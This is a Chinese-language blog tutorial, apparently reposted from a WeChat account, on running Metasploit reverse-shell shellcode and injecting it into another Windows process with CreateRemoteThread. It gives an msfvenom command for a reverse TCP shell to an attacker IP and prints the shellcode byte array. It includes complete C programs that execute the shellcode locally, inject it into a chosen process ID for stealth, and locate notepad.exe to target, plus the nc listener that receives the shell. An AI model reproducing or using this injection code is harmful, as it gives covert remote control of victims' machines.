CreateRemoteThread注入Shellcode

  • A+
所属分类:逆向工程

0x00 前言

shellcode是啥?

简单来说,shellcode就是⼀段可以获取权限的代码。这里我们先理解到这里,以后有机会我们再深入理解。

怎么生成shellcode?

可以在kali系统中用msfvenom生成shellcode

如果你没学过msfvenom,可以去 https://www.freebuf.com/sectool/72135.html 学习一下

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.174.3 LPORT=443 -f c -b x00x0ax0d

CreateRemoteThread注入Shellcode

生成的shellcode代码什么样子?

shellcode其实本质上是一段汇编代码,因此,我们要查看shellcode代码什么样子,其实是在想办法把shellcode转换成汇编。

其实将shellcode转换成汇编代码的方法挺多的,我比较喜欢将shellcode保存成exe,然后用Kali自带的ndisasm命令查看。

先用python脚本把shellcode保存成exe:

ps: 要用Python2

#!/usr/bin/env python
# -*- coding: utf-8 -*-

shellcode = "x48x31xc9x48x81xe9xc6xffxffxffx48x8dx05xefxff"
"xffxffx48xbbxa2xd8x0exfexd3xcdx9cxaex48x31x58"
"x27x48x2dxf8xffxffxffxe2xf4x5ex90x8dx1ax23x25"
"x5cxaexa2xd8x4fxafx92x9dxcexffxf4x90x3fx2cxb6"
"x85x17xfcxc2x90x85xacxcbx85x17xfcx82x90x85x8c"
"x83x85x93x19xe8x92x43xcfx1ax85xadx6ex0exe4x6f"
"x82xd1xe1xbcxefx63x11x03xbfxd2x0cx7ex43xf0x99"
"x5fxb6x58x9fxbcx25xe0xe4x46xffx03x46x1cx26xa2"
"xd8x0exb6x56x0dxe8xc9xeaxd9xdexaex58x85x84xea"
"x29x98x2exb7xd2x1dx7fxf8xeax27xc7xbfx58xf9x14"
"xe6xa3x0ex43xcfx1ax85xadx6ex0ex99xcfx37xdex8c"
"x9dx6fx9ax38x7bx0fx9fxcexd0x8axaax9dx37x2fxa6"
"x15xc4xeax29x98x2axb7xd2x1dxfaxefx29xd4x46xba"
"x58x8dx80xe7xa3x08x4fx75xd7x45xd4xafx72x99x56"
"xbfx8bx93xc5xf4xe3x80x4fxa7x92x97xd4x2dx4exf8"
"x4fxacx2cx2dxc4xefxfbx82x46x75xc1x24xcbx51x5d"
"x27x53xb7x6dxbaxefx9cxfdxebx3cxfexd3x8cxcaxe7"
"x2bx3ex46x7fx3fx6dx9dxaexa2x91x87x1bx9ax71x9e"
"xaexa3x63xcex56x7dxcexddxfaxebx51xeaxb2x5ax3c"
"xddx14xeexafx28xf9x2cx18xd0x27x48xb0x0fxffxd3"
"xcdxc5xefx18xf1x8ex95xd3x32x49xfexf2x95x3fx37"
"x9exfcx5cxe6x5dx18x46x77x11x85x63x6exeax51xcf"
"xbfx69x27x93x71x42x27xdbxb6x5ax0axf6xbexe3x80"
"x42x77x31x85x15x57xe3x62x97x5bxa7xacx63x7bxea"
"x59xcaxbexd1xcdx9cxe7x1axbbx63x9axd3xcdx9cxae"
"xa2x99x5exbfx83x85x15x4cxf5x8fx59xb3xe2x0dxf6"
"xa3xfbx99x5ex1cx2fxabx5bxeax86x8cx0fxffx9bx40"
"xd8x8axbax1ex0ex96x9bx44x7axf8xf2x99x5exbfx83"
"x8cxccxe7x5dx18x4fxaex9ax32x54xe3x2bx19x42x77"
"x12x8cx26xd7x6exe7x88x01x06x85xadx7cxeax27xc4"
"x75xddx8cx26xa6x25xc5x6ex01x06x76x6cx1bx00x8e"
"x4fx44x75x58x21x33x5dx0dx46x7dx17xe5xa0xa8xde"
"xd2x8ex05x33xb8x99x15xe5xcbx7cx91xb9xcdxc5xef"
"x2bx02xf1x2bxd3xcdx9cxae"

with open("Shellcode.exe", 'wb') as fp:
fp.write(shellcode)

写完之后,可以先用hexdump查看生成的 Shellcode.exe,看看写入是否正确

hexdump Shellcode.exe

CreateRemoteThread注入Shellcode

确认没什么问题之后再用ndisasm查看

ndisasm Shellcode.exe -p intel

CreateRemoteThread注入Shellcode

怎么使用?

上面说到,shellcode本质上是一段代码,即然是代码,那么我们要怎么调用呢?能不能直接把shellcode强制类型转换成函数指针,然后直接调用它呢?于是我们有了以下的代码:

#define _CRT_SECURE_NO_DEPRECATE

#include "Windows.h"

int main(){
unsigned char buf[] =
"x48x31xc9x48x81xe9xc6xffxffxffx48x8dx05xefxff"
"xffxffx48xbbxa2xd8x0exfexd3xcdx9cxaex48x31x58"
"x27x48x2dxf8xffxffxffxe2xf4x5ex90x8dx1ax23x25"
"x5cxaexa2xd8x4fxafx92x9dxcexffxf4x90x3fx2cxb6"
"x85x17xfcxc2x90x85xacxcbx85x17xfcx82x90x85x8c"
"x83x85x93x19xe8x92x43xcfx1ax85xadx6ex0exe4x6f"
"x82xd1xe1xbcxefx63x11x03xbfxd2x0cx7ex43xf0x99"
"x5fxb6x58x9fxbcx25xe0xe4x46xffx03x46x1cx26xa2"
"xd8x0exb6x56x0dxe8xc9xeaxd9xdexaex58x85x84xea"
"x29x98x2exb7xd2x1dx7fxf8xeax27xc7xbfx58xf9x14"
"xe6xa3x0ex43xcfx1ax85xadx6ex0ex99xcfx37xdex8c"
"x9dx6fx9ax38x7bx0fx9fxcexd0x8axaax9dx37x2fxa6"
"x15xc4xeax29x98x2axb7xd2x1dxfaxefx29xd4x46xba"
"x58x8dx80xe7xa3x08x4fx75xd7x45xd4xafx72x99x56"
"xbfx8bx93xc5xf4xe3x80x4fxa7x92x97xd4x2dx4exf8"
"x4fxacx2cx2dxc4xefxfbx82x46x75xc1x24xcbx51x5d"
"x27x53xb7x6dxbaxefx9cxfdxebx3cxfexd3x8cxcaxe7"
"x2bx3ex46x7fx3fx6dx9dxaexa2x91x87x1bx9ax71x9e"
"xaexa3x63xcex56x7dxcexddxfaxebx51xeaxb2x5ax3c"
"xddx14xeexafx28xf9x2cx18xd0x27x48xb0x0fxffxd3"
"xcdxc5xefx18xf1x8ex95xd3x32x49xfexf2x95x3fx37"
"x9exfcx5cxe6x5dx18x46x77x11x85x63x6exeax51xcf"
"xbfx69x27x93x71x42x27xdbxb6x5ax0axf6xbexe3x80"
"x42x77x31x85x15x57xe3x62x97x5bxa7xacx63x7bxea"
"x59xcaxbexd1xcdx9cxe7x1axbbx63x9axd3xcdx9cxae"
"xa2x99x5exbfx83x85x15x4cxf5x8fx59xb3xe2x0dxf6"
"xa3xfbx99x5ex1cx2fxabx5bxeax86x8cx0fxffx9bx40"
"xd8x8axbax1ex0ex96x9bx44x7axf8xf2x99x5exbfx83"
"x8cxccxe7x5dx18x4fxaex9ax32x54xe3x2bx19x42x77"
"x12x8cx26xd7x6exe7x88x01x06x85xadx7cxeax27xc4"
"x75xddx8cx26xa6x25xc5x6ex01x06x76x6cx1bx00x8e"
"x4fx44x75x58x21x33x5dx0dx46x7dx17xe5xa0xa8xde"
"xd2x8ex05x33xb8x99x15xe5xcbx7cx91xb9xcdxc5xef"
"x2bx02xf1x2bxd3xcdx9cxae";


// 首先要将buf转换成指针,所以要先用 void *
((void (*)())(void *)buf)();
return 0;
}

直接运行一下,发现触发了异常,为什么呢?

CreateRemoteThread注入Shellcode

这里就要复习一下PE区段的知识了,通常,一个 PE 文件中有 4 个区段:

https://blog.csdn.net/Simon798/article/details/96876910

  • .text:(代码段),可读、可执行

  • .data:(数据段),存放全局变量、全局常量等。可读、可写、不可执行。shellcode的位置就存在这里。

  • .idata:(数据段),导入函数的代码段,存放外部函数地址

  • .rdata:(数据段),资源数据段,程序用到什么资源数据都在这里

.data段权限

如果你想验证一下.data段有什么权限,可以去吾爱破解的爱盘上下载一个LordPE,然后随便找个exe,按照下图操作:

CreateRemoteThread注入Shellcode

CreateRemoteThread注入Shellcode

CreateRemoteThread注入Shellcode

CreateRemoteThread注入Shellcode

CreateRemoteThread注入Shellcode

0x01 在本地进程中执行shellcode

即然直接不能用,我们只能在程序中向操作系统申请一块可读可写可执行的内存区域来执行shellcode了。这时候,就用到VirtualAlloc函数了。

VirtualAlloc

我们可以从微软官网找到该函数的api:https://docs.microsoft.com/zh-cn/windows/win32/api/memoryapi/nf-memoryapi-virtualalloc?redirectedfrom=MSDN ,也可以从百度百科中看中文翻译:https://baike.baidu.com/item/VirtualAlloc

LPVOID VirtualAlloc(
LPVOID lpAddress,
// 要分配的内存区域的地址,如果值是NULL,则由系统决定
SIZE_T dwSize,
// 分配的大小,以字节为单位,通常是shellcode的大小
DWORD flAllocationType,
// 分配的类型,通常使用 MEM_COMMIT
DWORD flProtect
// 该内存的初始保护属性,通常使用 PAGE_EXECUTE_READWRITE ,表示可读可写可执行
)
;

分配完后,当然是使用memcpy将我们的shellcode拷贝过去,然后执行就行。

OK,上面已经将大概到算法讲完了,将上一节中生成的shellcode--buf数组放在C++代码中,然后用VirtualAlloc分配内存空间,再调用即可。

调用shellcode的C++代码如下:

#define _CRT_SECURE_NO_DEPRECATE

#include "Windows.h"

int main(){
unsigned char buf[] =
"x48x31xc9x48x81xe9xc6xffxffxffx48x8dx05xefxff"
"xffxffx48xbbxa2xd8x0exfexd3xcdx9cxaex48x31x58"
"x27x48x2dxf8xffxffxffxe2xf4x5ex90x8dx1ax23x25"
"x5cxaexa2xd8x4fxafx92x9dxcexffxf4x90x3fx2cxb6"
"x85x17xfcxc2x90x85xacxcbx85x17xfcx82x90x85x8c"
"x83x85x93x19xe8x92x43xcfx1ax85xadx6ex0exe4x6f"
"x82xd1xe1xbcxefx63x11x03xbfxd2x0cx7ex43xf0x99"
"x5fxb6x58x9fxbcx25xe0xe4x46xffx03x46x1cx26xa2"
"xd8x0exb6x56x0dxe8xc9xeaxd9xdexaex58x85x84xea"
"x29x98x2exb7xd2x1dx7fxf8xeax27xc7xbfx58xf9x14"
"xe6xa3x0ex43xcfx1ax85xadx6ex0ex99xcfx37xdex8c"
"x9dx6fx9ax38x7bx0fx9fxcexd0x8axaax9dx37x2fxa6"
"x15xc4xeax29x98x2axb7xd2x1dxfaxefx29xd4x46xba"
"x58x8dx80xe7xa3x08x4fx75xd7x45xd4xafx72x99x56"
"xbfx8bx93xc5xf4xe3x80x4fxa7x92x97xd4x2dx4exf8"
"x4fxacx2cx2dxc4xefxfbx82x46x75xc1x24xcbx51x5d"
"x27x53xb7x6dxbaxefx9cxfdxebx3cxfexd3x8cxcaxe7"
"x2bx3ex46x7fx3fx6dx9dxaexa2x91x87x1bx9ax71x9e"
"xaexa3x63xcex56x7dxcexddxfaxebx51xeaxb2x5ax3c"
"xddx14xeexafx28xf9x2cx18xd0x27x48xb0x0fxffxd3"
"xcdxc5xefx18xf1x8ex95xd3x32x49xfexf2x95x3fx37"
"x9exfcx5cxe6x5dx18x46x77x11x85x63x6exeax51xcf"
"xbfx69x27x93x71x42x27xdbxb6x5ax0axf6xbexe3x80"
"x42x77x31x85x15x57xe3x62x97x5bxa7xacx63x7bxea"
"x59xcaxbexd1xcdx9cxe7x1axbbx63x9axd3xcdx9cxae"
"xa2x99x5exbfx83x85x15x4cxf5x8fx59xb3xe2x0dxf6"
"xa3xfbx99x5ex1cx2fxabx5bxeax86x8cx0fxffx9bx40"
"xd8x8axbax1ex0ex96x9bx44x7axf8xf2x99x5exbfx83"
"x8cxccxe7x5dx18x4fxaex9ax32x54xe3x2bx19x42x77"
"x12x8cx26xd7x6exe7x88x01x06x85xadx7cxeax27xc4"
"x75xddx8cx26xa6x25xc5x6ex01x06x76x6cx1bx00x8e"
"x4fx44x75x58x21x33x5dx0dx46x7dx17xe5xa0xa8xde"
"xd2x8ex05x33xb8x99x15xe5xcbx7cx91xb9xcdxc5xef"
"x2bx02xf1x2bxd3xcdx9cxae";


void* exec = VirtualAlloc(0, sizeof buf, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(exec, buf, sizeof buf);
((void(*)())exec)();

return 0;
}

ps:如果无法理解((void(*)())exec)();,请参考上一篇文章。

这里因为受害机器是win10 64位,所以vs在编译到时候,我选了x64

CreateRemoteThread注入Shellcode

编译完成后,就可以在 项目文件夹下->x64->Release找到生成的exe了

CreateRemoteThread注入Shellcode

这时候回到kali中,使用nc开启监听,然后执行生成的exe

nc -lvvp 443

CreateRemoteThread注入Shellcode

拿到shell了,说明shellcode执行成功了。

0x02 在远程进程中执行shellcode

shellcode作为一段与地址无关的代码,理论上只要把它放在任意程序中,然后给它一个起点就能执行,因此,为了隐秘性,我们可以考虑把shellcode放在已有程序中运行。

这时候我们就用到了VirtualAllocEx,它可以在指定进程去开辟内存。

VirtualAllocEx

同样,我们可以从微软官网找到该函数的api:https://docs.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualallocex ,也可以从百度百科中看中文翻译:https://baike.baidu.com/item/VirtualAllocEx

LPVOID VirtualAllocEx(
HANDLE hProcess,
// 申请内存所在的进程句柄
LPVOID lpAddress,
// 保留页面的内存地址,一般用NULL自动分配
SIZE_T dwSize,
// 欲分配的内存大小,字节为单位,通常是shellcode大小
DWORD flAllocationType,
// 指定要分配的内存类型,常用 MEM_RESERVE | MEM_COMMIT
DWORD flProtect
// 指定分配的内存保护,由于它将包含要执行的代码,因此常用 PAGE_EXECUTE_READWRITE,可读可写可执行
)
;

根据VirtualAllocEx的参数,我们只有hProcess,即要注入进程的句柄,因此这里需要用到OpenProcess函数

OpenProcess

老规矩,微软官方api:https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-openprocess ,百度百科:https://baike.baidu.com/item/OpenProcess

HANDLE OpenProcess(
DWORD dwDesiredAccess,
// 渴望得到的访问权限(标志),那肯定是PROCESS_ALL_ACCESS,所有权限啊
BOOL bInheritHandle,
// 是否继承句柄,一般不
DWORD dwProcessId
// 进程标识符,即受害者进程的PID
)
;

然后我们就需要将shellcode拷贝过去,这里就不能使用memcpy了,因为我们要写入某一进程的内存区域,直接写入会出 Access Violation 错误,故需要用到 WriteProcessMemory函数。

WriteProcessMemory

微软官方api:https://docs.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-writeprocessmemory ,百度百科: https://baike.baidu.com/item/WriteProcessMemory

BOOL WriteProcessMemory(
HANDLE hProcess,
// 要向其中写入数据的进程,即由OpenProcess返回的进程句柄
LPVOID lpBaseAddress,
// 要写入的数据的首地址,VirtualAllocEx的返回值
LPCVOID lpBuffer,
// 指向要写的数据的指针,该指针必须是const指针,即shellcode
SIZE_T nSize,
// 要写入的字节数,shellcode大小
SIZE_T *lpNumberOfBytesWritten
// 接收传输到指定进程中的字节数,通常为NULL
)
;

shellcode写进去了还要调用才能执行,这里需要用到创建远程线程的函数:CreateRemoteThread

CreateRemoteThread

微软api:https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createremotethread,百度百科:https://baike.baidu.com/item/CreateRemoteThread。

HANDLE CreateRemoteThread(
HANDLE hProcess,
// 线程所属进程的进程句柄,即OpenProcess返回的句柄
LPSECURITY_ATTRIBUTES lpThreadAttributes,
// 线程的安全属性,通常为NULL
SIZE_T dwStackSize,
// 线程栈初始大小,以字节为单位,通常为0,即代表使用系统默认大小.
LPTHREAD_START_ROUTINE lpStartAddress,
// 在远程进程的地址空间中,该进程的线程函数的起始地址。VirtualAllocEx返回值,注意需要强制类型转换成 LPTHREAD_START_ROUTINE
LPVOID lpParameter,
// 传给线程函数的参数的指针,这里为NULL,在DLL注入的时候有重要意义
DWORD dwCreationFlags,
// 线程的创建标志,通常为0,即线程创建后立即运行
LPDWORD lpThreadId
// 指向所创建线程ID的指针,通常为NULL
)
;

代码

下面的代码会将shellcode注入到指定到PID进程中,注入后,该进程将会反弹shell给攻击者。

#define _CRT_SECURE_NO_DEPRECATE
#include "Windows.h"
#include "stdio.h"

int main(int argc, char* argv[]){
unsigned char buf[] =
"x48x31xc9x48x81xe9xc6xffxffxffx48x8dx05xefxff"
"xffxffx48xbbxa2xd8x0exfexd3xcdx9cxaex48x31x58"
"x27x48x2dxf8xffxffxffxe2xf4x5ex90x8dx1ax23x25"
"x5cxaexa2xd8x4fxafx92x9dxcexffxf4x90x3fx2cxb6"
"x85x17xfcxc2x90x85xacxcbx85x17xfcx82x90x85x8c"
"x83x85x93x19xe8x92x43xcfx1ax85xadx6ex0exe4x6f"
"x82xd1xe1xbcxefx63x11x03xbfxd2x0cx7ex43xf0x99"
"x5fxb6x58x9fxbcx25xe0xe4x46xffx03x46x1cx26xa2"
"xd8x0exb6x56x0dxe8xc9xeaxd9xdexaex58x85x84xea"
"x29x98x2exb7xd2x1dx7fxf8xeax27xc7xbfx58xf9x14"
"xe6xa3x0ex43xcfx1ax85xadx6ex0ex99xcfx37xdex8c"
"x9dx6fx9ax38x7bx0fx9fxcexd0x8axaax9dx37x2fxa6"
"x15xc4xeax29x98x2axb7xd2x1dxfaxefx29xd4x46xba"
"x58x8dx80xe7xa3x08x4fx75xd7x45xd4xafx72x99x56"
"xbfx8bx93xc5xf4xe3x80x4fxa7x92x97xd4x2dx4exf8"
"x4fxacx2cx2dxc4xefxfbx82x46x75xc1x24xcbx51x5d"
"x27x53xb7x6dxbaxefx9cxfdxebx3cxfexd3x8cxcaxe7"
"x2bx3ex46x7fx3fx6dx9dxaexa2x91x87x1bx9ax71x9e"
"xaexa3x63xcex56x7dxcexddxfaxebx51xeaxb2x5ax3c"
"xddx14xeexafx28xf9x2cx18xd0x27x48xb0x0fxffxd3"
"xcdxc5xefx18xf1x8ex95xd3x32x49xfexf2x95x3fx37"
"x9exfcx5cxe6x5dx18x46x77x11x85x63x6exeax51xcf"
"xbfx69x27x93x71x42x27xdbxb6x5ax0axf6xbexe3x80"
"x42x77x31x85x15x57xe3x62x97x5bxa7xacx63x7bxea"
"x59xcaxbexd1xcdx9cxe7x1axbbx63x9axd3xcdx9cxae"
"xa2x99x5exbfx83x85x15x4cxf5x8fx59xb3xe2x0dxf6"
"xa3xfbx99x5ex1cx2fxabx5bxeax86x8cx0fxffx9bx40"
"xd8x8axbax1ex0ex96x9bx44x7axf8xf2x99x5exbfx83"
"x8cxccxe7x5dx18x4fxaex9ax32x54xe3x2bx19x42x77"
"x12x8cx26xd7x6exe7x88x01x06x85xadx7cxeax27xc4"
"x75xddx8cx26xa6x25xc5x6ex01x06x76x6cx1bx00x8e"
"x4fx44x75x58x21x33x5dx0dx46x7dx17xe5xa0xa8xde"
"xd2x8ex05x33xb8x99x15xe5xcbx7cx91xb9xcdxc5xef"
"x2bx02xf1x2bxd3xcdx9cxae";

HANDLE processHandle;
HANDLE remoteThread;
PVOID remoteBuffer;

printf("Injecting to PID: %i", atoi(argv[1]));
processHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, DWORD(atoi(argv[1])));
remoteBuffer = VirtualAllocEx(processHandle, NULL, sizeof buf, (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);
WriteProcessMemory(processHandle, remoteBuffer, buf, sizeof buf, NULL);
remoteThread = CreateRemoteThread(processHandle, NULL, 0, (LPTHREAD_START_ROUTINE)remoteBuffer, NULL, 0, NULL);
CloseHandle(processHandle);

return 0;
}

先在受害机器上打开一个记事本,然后用任务管理器查看记事本到PID

CreateRemoteThread注入Shellcode

kali开启监听

CreateRemoteThread注入Shellcode

再生成解决方案,找到生成到exe

CreateRemoteThread注入Shellcode

CreateRemoteThread注入Shellcode

CreateRemoteThread注入Shellcode

然后在命令提示符下运行

CreateRemoteThread注入Shellcode

这时候kali已经收到shell了

CreateRemoteThread注入Shellcode

0x03 小尾巴

按照上面的代码,我们每次都要手动输入PID,实战性不大,因此我们还需要一段可以列出当前所有进程,匹配我们想要注入的进程名,然后获取该进程名对应的PID的代码。这里我们可以直接看微软官方给的demo:https://docs.microsoft.com/en-us/windows/win32/toolhelp/taking-a-snapshot-and-viewing-processes ,然后简单修改测试一下

#define _CRT_SECURE_NO_DEPRECATE

#include <Windows.h>
#include <tlhelp32.h>
#include <tchar.h>


int main(){
HANDLE hProcessSnap;
HANDLE hProcess;
PROCESSENTRY32 pe32;
DWORD pid = 0;

// 获取系统中所有进程的快照
hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (hProcessSnap == INVALID_HANDLE_VALUE)
{
CloseHandle(hProcessSnap);
exit(-1);
}
// 使用之前要先设置大小
pe32.dwSize = sizeof(PROCESSENTRY32);
// 查看第一个进程
BOOL bRet = Process32First(hProcessSnap, &pe32);
if (!bRet)
{
exit(-2);
}
while (bRet)
{
if (wcscmp(pe32.szExeFile, L"notepad.exe") == 0) {
pid = pe32.th32ProcessID;
break;
}
bRet = Process32Next(hProcessSnap, &pe32);
}
// 获取进程句柄
hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
_tprintf(TEXT("PROCESS NAME: %s"), pe32.szExeFile);
_tprintf(TEXT("nProcess ID: %d"), pe32.th32ProcessID);

// 清理
CloseHandle(hProcessSnap);
return 0;
}

CreateRemoteThread注入Shellcode

0x04 参考

学这玩意,还是官方文档最管用:https://docs.microsoft.com/zh-cn/windows/win32/api/

https://www.ired.team/offensive-security/code-injection-process-injection/process-injection

https://mp.weixin.qq.com/s/3hQP09l36ssrV5tzpzwcVA

ProcessExplorer:https://docs.microsoft.com/en-us/sysinternals/downloads/process-explorer

CreateRemoteThread注入Shellcode


本文始发于微信公众号(江南小虫虫):CreateRemoteThread注入Shellcode

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: